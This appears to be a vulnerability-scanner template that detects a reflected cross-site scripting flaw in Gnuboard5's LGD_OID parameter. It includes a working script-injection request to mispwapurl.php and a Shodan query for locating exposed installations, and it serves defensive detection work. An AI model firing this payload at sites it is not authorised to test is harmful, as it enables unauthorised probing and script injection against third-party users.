35 lines
794 B
YAML
35 lines
794 B
YAML
id: gnuboard5-rxss
|
|
|
|
info:
|
|
name: Gnuboard5 - Cross-Site Scripting
|
|
author: arafatansari
|
|
severity: medium
|
|
description: |
|
|
Gnuboard 5 is vulnerable to reflected XSS via $_GET['LGD_OID'].
|
|
reference:
|
|
- https://huntr.dev/bounties/ed317cde-9bd1-429e-b6d3-547e72534dd5/
|
|
metadata:
|
|
verified: true
|
|
shodan-query: http.html:"gnuboard5"
|
|
tags: gnuboard,xss,huntr
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/mobile/shop/lg/mispwapurl.php?LGD_OID=%3Cscript%3Ealert(document.domain)%3C/script%3E"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
words:
|
|
- 'LGD_OID = <script>alert(document.domain)</script>'
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- text/html
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|